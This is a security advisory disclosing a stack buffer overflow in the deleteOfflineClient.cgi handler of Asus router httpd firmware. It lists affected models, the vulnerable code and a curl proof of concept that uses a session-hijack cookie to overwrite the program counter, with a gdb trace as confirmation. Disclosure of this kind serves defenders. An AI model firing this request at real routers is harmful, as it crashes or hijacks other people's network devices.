Asus_DeleteOfflineClientOverflow

## [Vulnerability]: ## Stack buffer overflow in httpd ------------------------------------------ ## [Exploitation]: ## Can control the $pc. Use together with a session hijack vulnerability or in a csrf attack, can remote code execution and then get a connectback shell. ------------------------------------------ ## [Vendor of Product]: ## Asus wireless router ------------------------------------------ ## [Affected Products and firmware version]: ## Asuswrt-Merlin ,all the firmware and the latest firmware is 380.67_0 RT-AC5300 ,all the firmware,include the last and before. RT_AC1900P ,all the firmware,include the last and before. RT-AC68U ,all the firmware,include the last and before. RT-AC68P ,all the firmware,include the last and before. RT-AC88U ,all the firmware,include the last and before. RT-AC66U ,all the firmware,include the last and before. RT-AC66U_B1 ,all the firmware,include the last and before. RT-AC58U ,all the firmware,include the last and before. RT-AC56U ,all the firmware,include the last and before. RT-AC55U ,all the firmware,include the last and before. RT-AC52U ,all the firmware,include the last and before. RT-AC51U ,all the firmware,include the last and before. RT-N18U ,all the firmware,include the last and before. RT-N66U ,all the firmware,include the last and before. RT-N56U ,all the firmware,include the last and before. RT-AC3200 ,all the firmware,include the last and before. RT-AC3100 ,all the firmware,include the last and before. RT_AC1200GU ,all the firmware,include the last and before. RT_AC1200G ,all the firmware,include the last and before. RT-AC1200 ,all the firmware,include the last and before. RT-AC53 ,all the firmware,include the last and before. RT-N12HP ,all the firmware,include the last and before. RT-N12HP_B1 ,all the firmware,include the last and before. RT-N12D1 ,all the firmware,include the last and before. RT-N12+ ,all the firmware,include the last and before. RT_N12+_PRO ,all the firmware,include the last and before. RT-N16 ,all the firmware,include the last and before. RT-N300 ,all the firmware,include the last and before. ------------------------------------------ ## [Attack Type]: ## Remote ------------------------------------------ ## [Can Cause Denial of Service?]: ## yes ------------------------------------------ ## [Reference]: ## https://github.com/RMerl/asuswrt-merlin/blob/master/release/src/router/httpd/web.c#L9277,L9289 http://asuswrt.lostrealm.ca/ https://www.asus.com/Networking/RTN12HP_B1/HelpDesk_Download/ (chose the others can download the firmware sourcecode) https://www.asus.com/Networking/Wireless-Routers-Products/ ------------------------------------------ ## [Discoverer]: ## Tianfeng Guan, pkav of Sichuan Silent Information Technology Company Ltd, http://www.silence.com.cn/ ------------------------------------------ ## [Affected components]: ## Affected executable application: httpd Affected source code file: \release\src\router\httpd\web.c Affected function: deleteOfflineClient(webs_t wp, char_t *urlPrefix, char_t *webDir, int arg, char_t *url, char_t *path, char_t *query) ------------------------------------------ ## [Vulnerability details]: ## When accessing the deleteOfflineClient.cgi of the web manager(httpd),the httpd will call the function deleteOfflineClient() to parses the url which in http GET request,and it will use function websGetVar() to get the value of the parameter delete_offline_client in the url. but, when saving the delete_offline_client to the stack buffer char mac_str[13],it doesn't limit the the length of the parameter delete_offline_client,so the stack buffer mac_str[13] will be overflow and this stack-based overflow can be used to gain control over httpd's control flow by overwriting the saved $ra stored on the stack. deleteOfflineClient(webs_t wp, char_t *urlPrefix, char_t *webDir, int arg, char_t *url, char_t *path, char_t *query) { char *mac = NULL; char mac_str[13]; mac = websGetVar(wp, "delete_offline_client",""); ...... ...... i = 0; while(*mac) { if(*mac==':') { mac++; continue; } else { mac_str[i] = tolower(*mac); i++; mac++; } } if(i!=12) return; ...... } ------------------------------------------ ## [Exploitation details]: ## Because access to the deleteOfflineClient.cgi page requires web authentication,so it needs a session hijack vulnerability or a csrf attack to get access permissions for the deleteOfflineClient.cgi at first. And then, we can use this vulnerability to control the httpd's control flow $pc by overwriting the saved $ra stored on the stack. For example, we can send a http get request like: `GET /deleteOfflineClient.cgi?delete_offline_client=aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:33:3 HTTP/1.1` And the httpd's control flow $pc will be set to 0x00333333. ------------------------------------------ ## [POC]: ## # Tested product and firmware version: RT-N12HP_B1 (3.0.0.4.380.3479) # With the help of CVE-2017-6549(Session hijack), this POC can exploit this vulnerability to control the $pc curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.2.1/deleteOfflineClient.cgi?delete_offline_client=aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:33:3 ------------------------------------------ [Gdb trace]: admin@RT-N12HP_B1:/tmp/bin# ./gdb httpd $(pidof httpd) dlopen failed on 'libthread_db.so.1' - File not found GDB will not be able to debug pthreads. GNU gdb 6.8 Copyright (C) 2008 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "mipsel-linux"... I'm sorry, Dave, I can't do that. Symbol format `elf32-tradlittlemips' unknown. Attaching to program: /usr/sbin/httpd, process 651 0x2ad8d05c in ?? () from /lib/libc.so.0 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00333333 in ?? () (gdb) i r zero at v0 v1 a0 a1 a2 a3 R0 00000000 00000001 0000000c 00000000 004570ae 2adb90d0 0000001f 7fd973ff t0 t1 t2 t3 t4 t5 t6 t7 R8 2adb90d0 7fd973e0 00000000 7fd970f0 2adb9f38 2adcc124 6172500a 3a616d67 s0 s1 s2 s3 s4 s5 s6 s7 R16 61616161 61616161 61616161 00000004 00446f4c 00000000 00446428 00498158 t8 t9 k0 k1 gp sp s8 ra R24 00000000 2ad9f7d0 2adcfa70 00000000 0044e8d0 7fd97400 00440000 00333333 status lo hi badvaddr cause pc 01009c13 11288d57 00000001 00333332 00000008 00333333 fcsr fir restart 00800000 00000000 00000000 (gdb) c Continuing. Program terminated with signal SIGSEGV, Segmentation fault. The program no longer exists. As we have seen, the registers ra and pc are overwritten by 0x00333333. Finally, with the ROP can lead to Remote Command Execution.